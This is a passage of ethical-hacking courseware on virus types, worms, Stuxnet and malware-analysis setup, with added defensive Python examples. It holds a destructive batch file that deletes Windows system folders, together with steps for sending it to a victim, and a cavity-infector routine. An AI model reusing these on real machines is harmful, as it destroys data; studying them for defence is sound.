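ALIGN = 512
PAYLOAD = b"<cavity virus code>" * 16          # 304 made-up bytes, no nulls


def find_cavities(data: bytes, min_len: int, fill: int = 0x00) -> list:
    """(offset, length) of every run of `fill` bytes at least `min_len` long."""
    runs, i, n = [], 0, len(data)
    while i < n:
        if data[i] != fill:
            i += 1
            continue
        j = i
        while j < n and data[j] == fill:
            j += 1
        if j - i >= min_len:
            runs.append((i, j - i))
        i = j
    return runs


def cavity_infect(data: bytes, payload: bytes) -> bytes:
    """Write payload into the first cavity that fits; the file length is unchanged."""
    cavities = find_cavities(data, len(payload))
    if not cavities:
        raise ValueError("no cavity large enough; a space filler would skip this host")
    off, _ = cavities[0]
    return data[:off] + payload + data[off + len(payload):]


def build_host() -> bytes:
    """Constructed host: header+code (104 bytes) and data (96 bytes), each padded to ALIGN."""
    def section(content: bytes) -> bytes:
        return content + bytes(-len(content) % ALIGN)
    code = b"MZ\x90\x00" + b"\xcc" * 100
    data = b"hello world!" * 8
    return section(code) + section(data)


def integrity_report(original: bytes, current: bytes) -> dict:
    """A size check alone is blind to cavity infection; a content hash is not."""
    return {
        "size_changed": len(original) != len(current),
        "hash_changed": hashlib.sha256(original).digest() != hashlib.sha256(current).digest(),
    }
```

Against a real PE the same search is run over each section's slack (the bytes between a section's raw data size and its aligned raw size), which is where CIH placed its code.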
FIGURE 7.13: File Overwriting or Cavity Virus (original file size 45 KB; infected file size 45 KB)
Sparse Infector Viruses

- A sparse infector virus infects only occasionally (e.g., every tenth program executed), or only files whose lengths fall within a narrow range.
- Difficult to detect: by infecting less often, such viruses try to minimize the probability of being discovered.
- Infection process in the figure: wake up on the 15th of every month and execute code.
Sparse Infector Viruses

Sparse infector viruses infect only occasionally (e.g., every tenth program executed, or on a particular day of the week) or only files whose lengths fall within a narrow range. By infecting less often, these viruses try to minimize the probability of being discovered: fewer infected files means fewer chances that a user notices a change or that a scanner's bait files are touched.
FIGURE 7.14: Working of Sparse Infector Viruses (wake up on the 15th of every month and execute code)
Companion/Camouflage Viruses

- A companion virus creates a companion file for each executable file it "infects"; the original executable is left unchanged.
- For example, a companion virus may save itself as notepad.com. Every time a user runs notepad (intending the good program notepad.exe), the command interpreter loads notepad.com (the virus) first and the system is infected.
- In the figure, the virus plants a file named notepad.com in the c:\winnt\system32 directory beside notepad.exe.
Companion/Camouflage Viruses

Companion Viruses

The companion virus stores itself under the same base name as the targeted program file but with a different extension. As soon as that name is executed, the virus runs, infects the computer, and modifies data on the hard disk. Companion viruses exploit the DOS rule that a COM file is run before an EXE file of the same name: the virus installs a COM file of identical name next to the EXE and is executed in its place.

Source: http://www.cknow.com/vtutor/CompanionViruses.html

Here is what happens. Suppose a companion virus is executing on your PC and decides it is time to infect a file. It looks around and happens to find a file called PGM.EXE. It now creates a file called PGM.COM containing the virus. The virus usually plants this file in the same directory as the .EXE file, but it could place it in any directory on your DOS path. If you type PGM and press Enter, DOS executes PGM.COM instead of PGM.EXE. (In order, DOS will execute COM, then EXE, and then BAT files of the same root name, if they are all in the same directory.) The virus executes, possibly infecting more files, and then loads and executes PGM.EXE. The user probably would fail to notice anything is wrong. It is easy to detect a companion virus just by the presence of the extra COM file on the system.
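The resolution rule in the quoted passage (current directory first, then each PATH directory; within a directory COM before EXE before BAT) is also the detection rule: any .COM that would be chosen in place of an .EXE of the same root name is a companion candidate. The block below is an added example, not code from the courseware or from the cited source; the directory listings are constructed. The same shadowing applies to cmd.exe on current Windows, whose default PATHEXT order likewise begins .COM;.EXE;.BAT;.CMD.

```python
"""DOS command resolution and companion-file detection.

Added example, not from the courseware. `search_dirs` is the ordered search
path as a list of (directory, [file names]): current directory first, then
the PATH entries. The listings in build_demo_dirs() are constructed.
"""
import os

DOS_ORDER = (".COM", ".EXE", ".BAT")   # tried in this order for an extension-less command


def resolve(command: str, search_dirs: list):
    """Return (directory, file) the command interpreter would run, or None."""
    root, ext = os.path.splitext(command)
    for directory, files in search_dirs:
        upper = {f.upper(): f for f in files}
        if ext:                                   # explicit extension: exact name only
            if command.upper() in upper:
                return directory, upper[command.upper()]
            continue
        for candidate_ext in DOS_ORDER:
            name = (root + candidate_ext).upper()
            if name in upper:
                return directory, upper[name]
    return None


def find_companions(search_dirs: list) -> list:
    """Every .EXE whose root name, typed without extension, would run a .COM
    instead. Covers both the same-directory case and a .COM planted earlier
    on the path. Returns (root, shadowing_com, shadowed_exe) triples."""
    hits = set()
    for directory, files in search_dirs:
        for f in files:
            root, ext = os.path.splitext(f)
            if ext.upper() != ".EXE":
                continue
            chosen = resolve(root, search_dirs)
            if chosen and chosen[1].upper().endswith(".COM"):
                hits.add((root.upper(), f"{chosen[0]}\\{chosen[1]}", f"{directory}\\{f}"))
    return sorted(hits)


def build_demo_dirs() -> list:
    """Constructed search path: a work directory with a planted PGM.COM, the
    system directory with a planted NOTEPAD.COM, and a clean directory."""
    return [
        ("C:\\WORK", ["REPORT.DOC", "PGM.EXE", "PGM.COM"]),
        ("C:\\WINNT\\SYSTEM32", ["NOTEPAD.EXE", "NOTEPAD.COM", "CMD.EXE"]),
        ("C:\\WINNT", ["EXPLORER.EXE"]),
    ]
```

On a live system the listings come from walking the current directory and each PATH entry; a .COM file that is small, recent, and sits beside an .EXE of the same name is the classic finding.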
FIGURE 7.15: Working of Companion/Camouflage Viruses (the virus plants notepad.com in the c:\winnt\system32 directory beside notepad.exe)
Shell Viruses

- The virus code forms a shell around the target host program's code, making itself the original program and the host code its sub-routine.
- Almost all boot program viruses are shell viruses.
- Before infection: original program. After infection: virus code -> original program.
Shell Viruses

A shell virus's code forms a layer around the target host program's code that can be compared to an "eggshell", making itself the original program and the host code its subroutine. Here the original code is moved to a new location by the virus code, and the virus assumes its identity: whatever invokes the program reaches the virus first, and the virus calls the displaced original when it is done, which is the same arrangement a boot sector virus makes with the relocated MBR.
FIGURE 7.16: Working of Shell Viruses
File Extension Viruses

- File extension viruses change the extensions of files
- .TXT is safe as it indicates a pure text file
- With extensions turned off, if someone sends you a file named BAD.TXT.VBS, you will only see BAD.TXT
- If you have forgotten that extensions are turned off, you might think this is a text file and open it
- This is an executable Visual Basic Script virus file and could do serious damage
- Countermeasure is to turn off "Hide file extensions" in Windows
File Extension Viruses

Source: http://www.cknow.com/vtutor/FileExtensions.html

- File extension viruses change the extensions of files
- .TXT is safe as it indicates a pure text file
- With extensions turned off, if someone sends you a file named BAD.TXT.VBS, you can only see BAD.TXT
- If you have forgotten that the extensions are actually turned off, you might think this is a text file and open it
- This is an executable Visual Basic Script virus file that could do serious damage

The countermeasure is to turn off "Hide file extensions" in Windows, as shown in the following screenshot:
[Screenshot: Windows Folder Options dialog, View tab, Advanced settings]
FIGURE 7.17: Uncheck Hide File Extensions
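As an added example that is not part of the course material, the following Python reproduces what Explorer shows for a file name when extensions are hidden and uses that to triage attachment names: any name whose visible part ends in a harmless-looking extension while its real, hidden extension is executable (the BAD.TXT.VBS case above) is flagged. The extension sets and the sample attachment names are constructed.

```python
"""Double-extension triage for the hidden-extension trick. Added example,
not course code; extension lists and sample names are constructed."""
from __future__ import annotations

from pathlib import PureWindowsPath

# Extensions Windows executes or runs as a script when double-clicked.
EXECUTABLE_EXTS = {".EXE", ".COM", ".BAT", ".CMD", ".SCR", ".PIF",
                   ".VBS", ".VBE", ".JS", ".JSE", ".WSF", ".WSH", ".HTA"}

# Extensions a user reads as "just data" and opens without hesitation.
DECOY_EXTS = {".TXT", ".DOC", ".DOCX", ".PDF", ".JPG", ".JPEG", ".PNG",
              ".XLS", ".XLSX", ".ZIP", ".HTM", ".HTML"}


def displayed_name(filename: str, hide_extensions: bool = True) -> str:
    """What Explorer shows for `filename`. With "Hide file extensions" on,
    the final extension is dropped (simplification: every extension is
    treated as a known file type). A name without an extension is shown as-is."""
    p = PureWindowsPath(filename)
    if hide_extensions and p.suffix:
        return p.stem
    return filename


def real_extension(filename: str) -> str:
    """The extension Windows actually acts on: the last one, upper-cased."""
    return PureWindowsPath(filename).suffix.upper()


def is_disguised(filename: str) -> bool:
    """True when the hidden real extension is executable but the name the
    user sees ends in a decoy extension, e.g. BAD.TXT.VBS shown as BAD.TXT."""
    if real_extension(filename) not in EXECUTABLE_EXTS:
        return False
    shown = displayed_name(filename, hide_extensions=True)
    return PureWindowsPath(shown).suffix.upper() in DECOY_EXTS


def triage(attachments: list[str]) -> dict[str, str]:
    """Map each attachment name to a verdict: 'disguised', 'executable' or 'ok'."""
    verdicts: dict[str, str] = {}
    for name in attachments:
        if is_disguised(name):
            verdicts[name] = "disguised"
        elif real_extension(name) in EXECUTABLE_EXTS:
            verdicts[name] = "executable"
        else:
            verdicts[name] = "ok"
    return verdicts


if __name__ == "__main__":
    # Constructed attachment names as they might arrive in a mailbox.
    sample = ["BAD.TXT.VBS", "Invoice.pdf.exe", "README.TXT",
              "setup.exe", "photo.jpg"]
    for name, verdict in triage(sample).items():
        print(f"{name:18} shown as {displayed_name(name):14} -> {verdict}")
```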
Add-on and Intrusive Viruses

Add-on Viruses

- Add-on viruses append their code to the host code without making any changes to the latter, or relocate the host code to insert their own code at the beginning
Add-on and Intrusive Viruses

Add-on Viruses

Most viruses are add-on viruses. This type of virus appends its code to the beginning of the host code without making any changes to the latter. Thus, the virus corrupts the startup information of the host code and places itself in its place, but it does not touch the host code. However, the virus code is executed before the host code. The only indication that the file is corrupted is that the size of the file has increased.

[Figure: the original program before and after infection; the viral code is added ahead of it with a JUMP into the original program]
FIGURE 7.18: Working of Add-on Viruses
Intrusive Viruses

Intrusive viruses overwrite the host with their own code, either by completely removing the target host's program code or by overwriting only part of it. Therefore, the original code is not executed properly.

[Figure: the original program before infection and after the virus overwrites part of it]
FIGURE 7.19: Working of Intrusive Viruses
Transient and Terminate and Stay Resident Viruses

Basic Infection Techniques

Direct Action or Transient Virus
- Transfers all the controls of the host code to where it resides
- Selects the target program to be modified and corrupts it

Terminate and Stay Resident Virus (TSR)
- Remains permanently in the memory during the entire work session even after the target host's program is executed and terminated; can be removed only by rebooting the system
Transient and Terminate and Stay Resident Viruses

Transient Viruses

Transient viruses transfer all control to the host code where they reside, select the target program to be modified, and corrupt it.

Terminate and Stay Resident Virus (TSR)

TSR viruses remain permanently in memory during the entire work session, even after the target host program is executed and terminated. They can be removed only by rebooting the system.
Writing a Simple Virus Program

1. Create a batch file Game.bat with this text:
   @echo off
   del c:\winnt\system32\*.*
   del c:\winnt\*.*
2. Convert the Game.bat batch file to Game.com using the bat2com utility
3. Send the Game.com file as an email attachment to a victim
4. When run, it deletes core files in the WINNT directory, making Windows unusable
Writing a Simple Virus Program

For demonstration purposes, a simple program that can be used to cause harm to a target system is shown here:

1. Create a batch file Game.bat with the following text:
   @echo off
   del c:\winnt\system32\*.*
   del c:\winnt\*.*
2. Convert the Game.bat batch file to Game.com using the bat2com utility
3. Assign an icon to Game.com using the Windows file properties screen
4. Send the Game.com file as an email attachment to a victim
5. When the victim runs this program, it deletes core files in the \WINNT directory, making Windows unusable

The victim would have to reinstall Windows, causing problems to already saved files.
Terabit Virus Maker

[Screenshot: TeraBIT Virus Maker option list]
TeraBIT Virus Maker

TeraBIT Virus Maker is a virus that is mostly detected by all antivirus software when scanned. This virus mostly doesn't harm the PC, but it can disable the antivirus that is installed on the system for a short time.
[Screenshot: TeraBIT Virus Maker main window with its option checkboxes]
FIGURE 7.20: TeraBIT Virus Maker
JPS Virus Maker and DELmE's Batch Virus Maker

[Screenshots: JPS Virus Maker 3.0 and DELmE's Batch Virus Maker]
JPS Virus Maker and DELmE's Batch Virus Maker

JPS Virus Maker

JPS Virus Maker is a tool to create viruses. It also has a feature to convert a virus into a worm and can be used to disable the normal hardware of the system.
[Screenshot: JPS Virus Maker 3.0 option list]
FIGURE 7.21: JPS Virus Maker Screenshot
DELmE's Batch Virus Maker

DELmE's Batch Virus Maker is a simple tool that allows you to create your own choice of bat file viruses to suit your tasks.

[Screenshot: DELmE's Batch Virus Maker option list]
FIGURE 7.22: DELmE's Batch Virus Maker Screenshot
Module Flow

Prior to this, we have discussed various types of viruses. Now we will discuss computer worms and how they are different from viruses.

[Module flow diagram: Virus and Worms Concepts; Types of Viruses; Computer Worms; Malware Analysis; Countermeasures; Penetration Testing]

This section describes worms, worm analysis (Stuxnet), and a worm maker (Internet Worm Maker Thing).
Computer Worms

- Computer worms are malicious programs that replicate, execute, and spread across network connections independently, without human interaction
- Most worms are created only to replicate and spread across a network, consuming available computing resources; however, some worms carry a payload to damage the host system
- Attackers use worm payloads to install backdoors in infected computers, which turns them into zombies and creates botnets; these botnets can be used to carry out further cyber attacks
Computer Worms

Computer worms are malicious programs that replicate, execute, and spread across network connections independently, without human interaction. Most worms are created only to replicate and spread across a network, consuming available computing resources; however, some worms carry a payload to damage the host system. A worm does not require a host to replicate, although in some cases one may argue that a worm's host is the machine it has infected. Worms are a subtype of viruses. Worms were considered mainly a mainframe problem, but after most of the world's systems were interconnected, worms were targeted against the Windows operating system, and were sent through email, IRC, and other network functions. Attackers use worm payloads to install backdoors in infected computers, which turns them into zombies and creates botnets; these botnets can be used to carry out further cyber-attacks.
How Is a Worm Different from a Virus?

- A worm is a special type of virus that can replicate itself and use memory, but cannot attach itself to other programs
- Replicates on its own: a worm takes advantage of file or information transport features on computer systems and spreads through the infected network automatically, but a virus does not
- Spreads through the infected network
How Is a Worm Different from a Virus?

Virus | Worm
A virus is a file that cannot be spread to other computers unless an infected file is replicated and actually sent to the other computer, whereas a worm does just the opposite. | A worm, after being installed on a system, can replicate itself and spread by using IRC, Outlook, or other applicable mailing programs.
Files such as .com, .exe, or .sys, or a combination of them are corrupted once the virus runs on the system. | A worm typically does not modify any stored programs.
Viruses are a lot harder to get off an infected machine. | As compared to a virus, a worm can be easily removed from the system.
Their spreading options are much less than that of a worm because viruses only infect files on the machine. | They have more spreading options than a virus.

TABLE 7.1: Difference between Virus and Worms
Worm Analysis: Stuxnet

- Stuxnet is a threat targeting a specific industrial control system likely in Iran, such as a gas pipeline or power plant
- The goal of Stuxnet is to sabotage that facility by reprogramming programmable logic controllers (PLCs) to operate as the attackers intend them to, most likely out of their specified boundaries

Stuxnet contains many features such as:
1. Self-replicates through removable drives exploiting a vulnerability allowing auto-execution
2. Spreads in a LAN through a vulnerability in the Windows Print Spooler
3. Spreads through SMB by exploiting the Microsoft Windows Server Service RPC Handling Remote Code Execution Vulnerability
4. Copies and executes itself on remote computers through network shares running a WinCC database server
5. Copies itself into Step 7 projects in such a way that it automatically executes when the Step 7 project is loaded
6. Updates itself through a peer-to-peer mechanism within a LAN
7. Exploits a total of four unpatched Microsoft vulnerabilities
8. Contacts a command and control server that allows the hacker to download and execute code, including updated versions
9. Contains a Windows rootkit that hides its binaries and attempts to bypass security products
10. Fingerprints a specific industrial control system and modifies code on the Siemens PLCs to potentially sabotage the system

http://www.symantec.com
Worm Analysis: Stuxnet

Source: http://www.symantec.com

Stuxnet is a complex threat and malware with diverse modules and functionalities. It is mostly used to grab control of and reprogram industrial control systems (ICS) by modifying code on programmable logic controllers (PLCs), which creates a way for the attacker to intrude into the complete system, launch an attack by making changes in the code, and take unauthorized control of the systems without the knowledge of the operators. Stuxnet contains many features such as:

- Self-replicates through removable drives exploiting a vulnerability allowing auto-execution
- Spreads in a LAN through a vulnerability in the Windows Print Spooler
- Spreads through SMB by exploiting the Microsoft Windows Server Service RPC Handling Remote Code Execution Vulnerability
- Copies and executes itself on remote computers through network shares running a WinCC database server
- Copies itself into Step 7 projects in such a way that it automatically executes when the Step 7 project is loaded
- Updates itself through a peer-to-peer mechanism within a LAN
- Exploits a total of four unpatched Microsoft vulnerabilities
- Contacts a command and control server that allows the hacker to download and execute code, including updated versions
- Contains a Windows rootkit that hides its binaries and attempts to bypass security products
- Fingerprints a specific industrial control system and modifies code on the Siemens PLCs to potentially sabotage the system
Worm Analysis: Stuxnet (Cont'd)

- Stuxnet consists of a large .dll file that contains many different exports and resources and two encrypted configuration blocks
- Stuxnet hooks Ntdll.dll to monitor for requests to load specially crafted file names; these specially crafted file names are mapped to another location instead, a location specified by W32.Stuxnet
- The dropper component of Stuxnet is a wrapper program that contains all of the above components stored inside itself in a section named "stub"
- When the threat is executed, the wrapper extracts the .dll file from the stub section, maps it into memory as a module, and calls one of the exports
- Whenever an export is called, Stuxnet typically injects the entire DLL into another process and then just calls the particular export
- When injecting into a trusted process, Stuxnet may keep the injected code in the trusted process or instruct the trusted process to inject the code into another currently running process
- It uses a special method designed to bypass behavior blocking and host intrusion-protection based technologies that monitor LoadLibrary calls

http://www.symantec.com
Worm Analysis: Stuxnet (Cont'd)

Source: http://www.symantec.com

Stuxnet consists of a large .dll file that contains many different exports and resources and two encrypted configuration blocks. It hooks Ntdll.dll to monitor for requests to load specially crafted filenames; these specially crafted filenames are mapped to another location instead, a location specified by W32.Stuxnet. The dropper component of Stuxnet is a wrapper program that contains all components stored inside itself in a section named "stub." When the threat is executed, the wrapper extracts the .dll file from the stub section, maps it into memory as a module, and calls one of the exports. Whenever an export is called, Stuxnet typically injects the entire DLL into another process and then just calls the particular export. When injecting into a trusted process, Stuxnet may keep the injected code in the trusted process or instruct the trusted process to inject the code into another currently running process. It uses a special method designed to bypass behavior blocking and host intrusion-protection based technologies that monitor LoadLibrary calls.
Module 07 Page 1073
Ethical Hacking and Countermeasures Viruses and Worms
Exam 312-50 Certified Ethical Hacker
Worm Analysis: Stuxnet (Cont'd)
Infection Routine Flow
Figure: Stuxnet infection routine flow diagram (slide version of Figure 7.23). Labels recoverable from the diagram: Check CFG; Decrypt & load self from disk, call export 6 (get version); Compare running version number and version on disk; Version OK; Date < 06/24/2012; Create global mutex; Decrypt resources 201 & 242 & write to disk; Create .pnf & .cfg files; Rootkit files Mrxnet.sys and Mrxcls.sys; Create rootkit service reg keys; Hides malicious files; Set file times; Create global mutexes; Inject in service, call export 32 (infects removable drives); Inject in Step 7 & call export 32 (infects Step 7 projects); Exit.
http://www.symantec.com
Worm Analysis: Stuxnet (Cont'd)
Source: http://www.symantec.com
Infection Routine Flow
Stuxnet checks if it has administrator rights on the computer. Stuxnet wants to run with the highest privilege possible so that it has permission to take whatever actions it likes on the computer. If it does not have Administrator rights, it executes one of the two zero-day escalation of privilege attacks described in the following diagram. If the process already has the rights it requires, it proceeds to prepare to call export 16 in the main .dll file. It calls export 16 by using the injection techniques described in the Injection Technique section. When the process does not have administrator rights on the system, it tries to attain these privileges by using one of two zero-day escalation of privilege attacks. The attack vector used is based on the operating system of the compromised computer. If the operating system is Windows Vista, Windows 7, or Windows Server 2008 R2, the currently undisclosed Task Scheduler Escalation of Privilege vulnerability is exploited. If the operating system is Windows XP, the currently undisclosed win32k.sys escalation of privilege vulnerability is exploited.
If exploited, both of these vulnerabilities result in the main .dll file running as a new process, either within the csrss.exe process in the case of the win32k.sys vulnerability or as a new task with administrator rights in the case of the Task Scheduler vulnerability. The code to exploit the win32k.sys vulnerability is stored in resource 250. Details of the Win32k.sys vulnerability and the Task Scheduler vulnerability currently are not released as patches are not yet available. After export 15 completes the required checks, export 16 is called. Export 16 is the main installer for Stuxnet. It checks the date and the version number of the compromised computer; decrypts, creates, and installs the rootkit files and registry keys; injects itself into the services.exe process to infect removable drives; injects itself into the Step7 process to infect all Step 7 projects; sets up the global mutexes that are used to communicate between different components; and connects to the RPC server. Export 16 first checks that the configuration data is valid; after that it checks the value "NTVDM TRACE" in the following registry key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\MS-DOS Emulation
FIGURE 7.23: Infection routine flow. Labels recoverable from the diagram: Check CFG; Error; Reg key NTVDM Trace = 19790529; Past deadline; Check OS: XP or less / Vista or higher; Set DACL; Set SACL; Decrypt & load self from disk, call export 6 (get version); Compare running version number and version on disk; Date < 06/24/2012 / Date OK; Create global mutex; Decrypt resources 201 & 242 & write to disk; Create .pnf & .cfg files (Oem7a.pnf); File OK; Rootkit files; Create rootkit service reg keys; Hides malicious files; Set file times; Create global mutexes; Inject in service, call export 32 (infects removable drives); Inject in Step 7 & call export 32 (infects Step 7 projects); Exit.
Worm Maker: Internet Worm Maker Thing
Internet Worm Maker Thing, Version 4.00: Public Edition
Worm Maker: Internet Worm Maker Thing
Internet Worm Maker Thing is a tool specifically designed for generating a worm. The generated Internet worms try to spread over networks; they are basically preset invasion proxy attacks that target the host technically, poison it, and establish a base and plans to launch the attack in future. The worms work independently. An Internet worm sends copies of itself via vulnerable computers on the Internet.
FIGURE 7.24: Internet Worm Maker Thing
Module Flow
Virus and Worms Concepts
Types of Viruses
Computer Worms
Malware Analysis
Countermeasures
Penetration Testing
Module Flow
Malware analysis is defined as the action of taking malware apart in order to study it. It is usually performed for various reasons, such as finding the vulnerabilities that are exploited for spreading the malware, the information that was stolen, and the prevention techniques to be taken against it to stop it from entering the system or network in future.
Detailed information about the malware analysis procedure is explained in the next few slides.
What Is a Sheep Dip Computer?
Sheep dipping refers to the analysis of suspect files, incoming messages, etc. for malware. A sheep dip computer is installed with port monitors, file monitors, network monitors, and antivirus software and connects to a network only under strictly controlled conditions.
Run user, group permission, and process monitors
Run device driver and file monitors
Run port and network monitors
Run registry and kernel monitors
What Is a Sheep Dip Computer?
Sheep dipping refers to the analysis of suspect files, incoming messages, etc. for malware. This "sheep dipped" computer is isolated from other computers on the network to block any viruses from entering the system. Before this procedure is carried out, any downloaded programs are saved on external media such as CD-ROMs or floppy diskettes. A sheep dip computer is installed with port monitors, file monitors, network monitors, and antivirus software and connects to a network only under strictly controlled conditions. A sheep dip computer:
Runs port and network monitors
Runs user, group permission, and process monitors
Runs device driver and file monitors
Runs registry and kernel monitors
Anti-Virus Sensor Systems
An anti-virus system is a collection of computer software that detects and analyzes malicious code threats such as viruses, worms, and Trojans. They are used along with sheep dip computers.
Antivirus Sensor Systems
An antivirus system is a collection of computer software that detects and analyzes various malicious code threats such as viruses, worms, and Trojans. They are used along with sheep dip computers.
FIGURE 7.25: Working of Antivirus Sensor Systems. The anti-virus system (Anti-Virus, Anti-Spyware, Anti-Trojan, Anti-Spamware, Anti-Phishing, and Email-Scanner components) sits between the network's systems (System 1, System 2, System 3) and the Internet; allowed traffic passes through and malicious traffic is reflected.
An antivirus system includes antivirus, anti-spyware, anti-Trojan, anti-spamware, anti-phishing, an email scanner, and so on. Usually, it is placed between the network and the Internet. It allows only genuine traffic to flow through the network and blocks malicious traffic from entering. As a result, it ensures network security.
Malware Analysis Procedure: Preparing Testbed
Install VMware or Virtual PC on the system
Install guest OS into the Virtual PC/VMware
Isolate the system from the network by ensuring that the NIC card is in "host only" mode
Disable the 'shared folders' and the 'guest isolation'
Copy the malware over to the guest OS
Malware Analysis Procedure: Preparing Testbed
Malware analysis provides in-depth understanding of each individual sample and identifies emerging technical trends from large collections of malware samples. The samples of malware are mostly compatible with the Windows binary executable. Malware analysis is conducted with a variety of goals. The following is the procedure for preparing the malware analysis testbed:
Install VMware or Virtual PC on the system
Install guest OS into the Virtual PC/VMware
Isolate the system from the network by ensuring that the NIC card is in "host only" mode
Disable the shared folders and the guest isolation
Copy the malware over to the guest OS
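The checklist above can be verified mechanically against the guest's .vmx file. The following is an added example, not the module's own material and not VMware's: it parses the key = "value" lines of a .vmx file and reports every setting that departs from a host-only NIC, no shared folders and disabled guest-isolation features. The key names it checks (ethernet0.connectionType, sharedFolderN.present, isolation.tools.hgfs.disable, isolation.tools.dnd.disable, isolation.tools.copy.disable, isolation.tools.paste.disable) are assumed VMware Workstation settings, and the two sample configs are constructed.

```python
"""Audit a VMware .vmx file against the testbed checklist: host-only NIC,
shared folders off, and the guest-isolation conveniences (drag and drop,
copy and paste) off.

Added example; not code from the CEH module or from VMware. The .vmx key
names used here are VMware Workstation settings as the author understands
them; treat them as assumptions and confirm them for your VMware version.
"""
import re
from typing import Dict, List

# One setting per line: key = "value" (VMware quotes values; bare ones are accepted too).
VMX_LINE = re.compile(r'^\s*([\w.:\-]+)\s*=\s*"?([^"]*)"?\s*$')

# Guest-isolation features; the value "TRUE" disables the feature.
ISOLATION_KEYS = (
    "isolation.tools.hgfs.disable",   # shared folders (HGFS)
    "isolation.tools.dnd.disable",    # drag and drop
    "isolation.tools.copy.disable",   # copy out of the guest
    "isolation.tools.paste.disable",  # paste into the guest
)


def parse_vmx(text: str) -> Dict[str, str]:
    """Return the key/value pairs of a .vmx file; blank lines and # comments are skipped."""
    settings: Dict[str, str] = {}
    for line in text.splitlines():
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        match = VMX_LINE.match(line)
        if match:
            settings[match.group(1)] = match.group(2).strip()
    return settings


def audit_vmx(text: str) -> List[str]:
    """Return findings for the guest; an empty list means it meets the checklist."""
    settings = parse_vmx(text)
    findings: List[str] = []

    # 1. Every NIC that is present must be in host-only mode.
    for key, value in settings.items():
        if key.startswith("ethernet") and key.endswith(".present") and value.upper() == "TRUE":
            nic = key[: -len(".present")]
            mode = settings.get(nic + ".connectionType", "")
            if mode.lower() != "hostonly":
                shown = mode or "unset"
                findings.append(f"{nic}: connectionType is '{shown}', expected 'hostonly'")

    # 2. No shared folder may still be defined.
    for key, value in settings.items():
        if key.startswith("sharedFolder") and key.endswith(".present") and value.upper() == "TRUE":
            findings.append(f"{key}: a shared folder is still defined")

    # 3. Each guest-isolation feature must be explicitly disabled.
    for key in ISOLATION_KEYS:
        if settings.get(key, "").upper() != "TRUE":
            findings.append(f"{key}: not set to TRUE, so the feature is still enabled")
    return findings


# Constructed sample configs (not real VM files): one as a freshly created VM
# tends to look, and one hardened according to the checklist.
WEAK_VMX = r'''
.encoding = "UTF-8"
config.version = "8"
displayName = "malware-lab"
ethernet0.present = "TRUE"
ethernet0.connectionType = "nat"
sharedFolder0.present = "TRUE"
sharedFolder0.hostPath = "C:\samples"
isolation.tools.hgfs.disable = "FALSE"
'''

HARDENED_VMX = r'''
.encoding = "UTF-8"
config.version = "8"
displayName = "malware-lab"
ethernet0.present = "TRUE"
ethernet0.connectionType = "hostonly"
isolation.tools.hgfs.disable = "TRUE"
isolation.tools.dnd.disable = "TRUE"
isolation.tools.copy.disable = "TRUE"
isolation.tools.paste.disable = "TRUE"
'''

if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_VMX), ("hardened", HARDENED_VMX)):
        print(f"{name}: {audit_vmx(cfg) or ['OK']}")
```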
Malware Analysis Procedure
1. Perform static analysis when the malware is inactive
2. Collect information about:
String values found in the binary with the help of string extracting tools such as BinText
The packaging and compressing technique used with the help of compression and decompression tools such as UPX
Malware Analysis Procedure
Step 1: Perform static analysis when the malware is inactive
Step 2: Collect information about:
String values found in the binary with the help of string extracting tools such as BinText
The packaging and compressing technique used with the help of compression and decompression tools such as UPX
BinText
Source: http://www.mcafee.com
BinText can extract text from any kind of file and includes the ability to find plain ASCII text, Unicode (double byte ANSI) text, and resource strings, providing useful information for each item in the optional "advanced" view mode.
FIGURE 7.26: BinText Screenshot. BinText 3.0.3 scanning setup.exe in Advanced view; the File pos, Mem pos, and Text columns list each string found (for example "!This program cannot be run in DOS mode", "IsProcessorFeaturePresent", "KERNEL32"); status line: Time taken: 0.109 secs, Text size: 37340 bytes (36.46K), AN: 1840, UN: 373, RS: 0.
UPX
Source: http://upx.sourceforge.net
UPX achieves an excellent compression ratio and offers very fast decompression. It typically compresses better than WinZip/zip/gzip.
FIGURE 7.27: UPX Working in Command Prompt. Running upx.exe (UPX 3.08w, Ultimate Packer for eXecutables, Copyright 1996-2011 Markus Oberhumer, Laszlo Molnar & John Reiser) without arguments in cmd.exe prints its usage: commands -1 compress faster, -9 compress better, -d decompress, -l list compressed file, -t test compressed file, -h give more help; options -q be quiet, -v be verbose, -oFILE write output to FILE, -f force compression of suspicious files, -k keep backup files; 'upx --help' gives more detailed help. UPX comes with ABSOLUTELY NO WARRANTY; for details visit http://upx.sf.net.
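As an added example covering both tools of steps 1 and 2 (it is not code from the module, BinText or UPX), the Python below extracts printable ASCII and UTF-16LE strings the way BinText does and reports cheap indicators that the file is UPX-packed and should be unpacked with upx -d before its strings are trusted. The sample bytes are constructed, and the UPX section names, the "UPX!" marker and the entropy threshold are heuristics rather than proof.

```python
"""Static triage for steps 1 and 2: pull the printable ASCII and Unicode
(UTF-16LE) strings from a binary, as BinText does, and look for signs that
the file is UPX-packed and must be unpacked first.

Added example; not code from the CEH module, BinText or UPX. The sample
bytes are constructed to resemble fragments of a Windows executable. The
UPX indicators (section names UPX0/UPX1 and the "UPX!" marker) and the
entropy figure are heuristics: a hit means "unpack and re-run strings".
"""
import math
import re
from collections import Counter
from typing import Dict, List


def ascii_strings(data: bytes, min_len: int = 5) -> List[str]:
    """Runs of printable ASCII (0x20-0x7E) at least min_len characters long."""
    pattern = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    return [m.group().decode("ascii") for m in pattern.finditer(data)]


def unicode_strings(data: bytes, min_len: int = 5) -> List[str]:
    """Runs of UTF-16LE text whose characters are printable ASCII (BinText's 'Unicode')."""
    pattern = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len)
    return [m.group().decode("utf-16-le") for m in pattern.finditer(data)]


def shannon_entropy(data: bytes) -> float:
    """Bits per byte, 0.0 (one value) to 8.0 (uniform); packed or encrypted code is usually above 7."""
    if not data:
        return 0.0
    total = len(data)
    return -sum((n / total) * math.log2(n / total) for n in Counter(data).values())


def packing_indicators(data: bytes) -> Dict[str, object]:
    """Cheap signs that strings extraction is being run on a packed file."""
    strings = ascii_strings(data) + unicode_strings(data)
    return {
        "upx_sections": b"UPX0" in data and b"UPX1" in data,  # section names UPX leaves behind
        "upx_marker": b"UPX!" in data,                         # UPX packer header magic
        "entropy": round(shannon_entropy(data), 2),
        "string_count": len(strings),                          # packed files yield few strings
    }


# Constructed sample: not an executable, just bytes carrying the artefacts
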